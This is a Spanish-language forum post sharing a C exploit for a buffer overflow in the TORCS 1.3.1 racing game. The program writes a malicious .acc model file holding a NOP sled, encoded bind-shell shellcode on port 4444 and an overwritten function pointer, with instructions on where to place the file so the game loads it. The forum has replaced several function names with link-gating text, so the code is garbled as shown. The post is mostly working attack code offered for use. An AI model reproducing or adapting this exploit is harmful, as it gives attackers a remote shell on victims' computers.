comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Exploit] TORCS acc Buffer Overflow

  • 0 Respuestas
  • 1667 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado s3cur1tyr00t

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Junio 25, 2012, 01:31:37 am »
Código: C
  1. /* Exploit Title: TORCS acc Buffer Overflow
  2. # Date: 20/12/2011
  3. # Author: Andres Gomez
  4. # Software Link: http://torcs.sourceforge.net/
  5. # Version: torcs 1.3.1
  6. # Tested on: Windows
  7. # CVE : */
  8.  
  9. /*
  10.     This exploit generates a corrupted acc file
  11.     which has to be saved in the directories where
  12.     TORCS loads its data, for example replace
  13.     cars/car4-trb1/car4-trb1.acc and put test.acc or create
  14.     a new car/track and select it in the TORCS menu
  15. */
  16.  
  17.  
  18. #include <stdio.h>
  19. #include <stdlib.h>
  20.  
  21. /*
  22.    Shellcode: windows/shell_bind_tcp LPORT=4444 -b '\x00\xff\x0a'
  23.    Encoder: x86/shikata_ga_nai
  24. */
  25.  
  26. unsigned char buf[] =
  27. "\xbd\x2e\xed\xb6\x2d\xdd\xc2\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
  28. "\x56\x83\xee\xfc\x31\x6e\x0f\x03\x6e\x21\x0f\x43\xd1\xd5\x46"
  29. "\xac\x2a\x25\x39\x24\xcf\x14\x6b\x52\x9b\x04\xbb\x10\xc9\xa4"
  30. "\x30\x74\xfa\x3f\x34\x51\x0d\x88\xf3\x87\x20\x09\x32\x08\xee"
  31. "\xc9\x54\xf4\xed\x1d\xb7\xc5\x3d\x50\xb6\x02\x23\x9a\xea\xdb"
  32. "\x2f\x08\x1b\x6f\x6d\x90\x1a\xbf\xf9\xa8\x64\xba\x3e\x5c\xdf"
  33. "\xc5\x6e\xcc\x54\x8d\x96\x67\x32\x2e\xa6\xa4\x20\x12\xe1\xc1"
  34. "\x93\xe0\xf0\x03\xea\x09\xc3\x6b\xa1\x37\xeb\x66\xbb\x70\xcc"
  35. "\x98\xce\x8a\x2e\x25\xc9\x48\x4c\xf1\x5c\x4d\xf6\x72\xc6\xb5"
  36. "\x06\x57\x91\x3e\x04\x1c\xd5\x19\x09\xa3\x3a\x12\x35\x28\xbd"
  37. "\xf5\xbf\x6a\x9a\xd1\xe4\x29\x83\x40\x41\x9c\xbc\x93\x2d\x41"
  38. "\x19\xdf\xdc\x96\x1b\x82\x88\x5b\x16\x3d\x49\xf3\x21\x4e\x7b"
  39. "\x5c\x9a\xd8\x37\x15\x04\x1e\x37\x0c\xf0\xb0\xc6\xae\x01\x98"
  40. "\x0c\xfa\x51\xb2\xa5\x82\x39\x42\x49\x57\xed\x12\xe5\x07\x4e"
  41. "\xc3\x45\xf7\x26\x09\x4a\x28\x56\x32\x80\x5f\x50\xfc\xf0\x0c"
  42. "\x37\xfd\x06\xa3\x9b\x88\xe1\xa9\x33\xdd\xba\x45\xf6\x3a\x73"
  43. "\xf2\x09\x69\x2f\xab\x9d\x25\x39\x6b\xa1\xb5\x6f\xd8\x0e\x1d"
  44. "\xf8\xaa\x5c\x9a\x19\xad\x48\x8a\x50\x96\x1b\x40\x0d\x55\xbd"
  45. "\x55\x04\x0d\x5e\xc7\xc3\xcd\x29\xf4\x5b\x9a\x7e\xca\x95\x4e"
  46. "\x93\x75\x0c\x6c\x6e\xe3\x77\x34\xb5\xd0\x76\xb5\x38\x6c\x5d"
  47. "\xa5\x84\x6d\xd9\x91\x58\x38\xb7\x4f\x1f\x92\x79\x39\xc9\x49"
  48. "\xd0\xad\x8c\xa1\xe3\xab\x90\xef\x95\x53\x20\x46\xe0\x6c\x8d"
  49. "\x0e\xe4\x15\xf3\xae\x0b\xcc\xb7\xdf\x41\x4c\x91\x77\x0c\x05"
  50. "\xa3\x15\xaf\xf0\xe0\x23\x2c\xf0\x98\xd7\x2c\x71\x9c\x9c\xea"
  51. "\x6a\xec\x8d\x9e\x8c\x43\xad\x8a";
  52.  
  53. // this points to your shellcode
  54. unsigned char function_pointer [] = "\xA8\xCA\x0E\x10";
  55.  
  56. int main(int argc, char **argv) {
  57.  
  58.     FILE *save_fd;
  59.     int i=0;
  60.  
  61.     save_fd = You are not allowed to view links. Register or Login("test.acc", "w");
  62.  
  63.     if (save_fd == NULL) {
  64.         You are not allowed to view links. Register or Login("Failed to open '%s' for writing", "test.acc");
  65.         return -1;
  66.     }
  67.  
  68.     You are not allowed to view links. Register or Login(save_fd, "AC3Db\n");
  69.     You are not allowed to view links. Register or Login(save_fd, "MATERIAL \"");
  70.     for(i=0; i < 607; i++) {
  71.         You are not allowed to view links. Register or Login('\x90', save_fd);
  72.     }
  73.     You are not allowed to view links. Register or Login(save_fd, "%s%s\" rgb 0.4 0.4 0.4  amb 0.8 0.8 0.8  emis 0.4 0.4 0.4  spec 0.5 0.5 0.5  shi 50  trans 0\n", buf, function_pointer);
  74.     You are not allowed to view links. Register or Login(save_fd, "OBJECT world\n");
  75.     You are not allowed to view links. Register or Login(save_fd, "kids %d\n", 5);
  76.  
  77.     close(save_fd);
  78.  
  79.     return 0;
  80. }
  81.  
« Última modificación: Mayo 19, 2014, 10:45:55 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!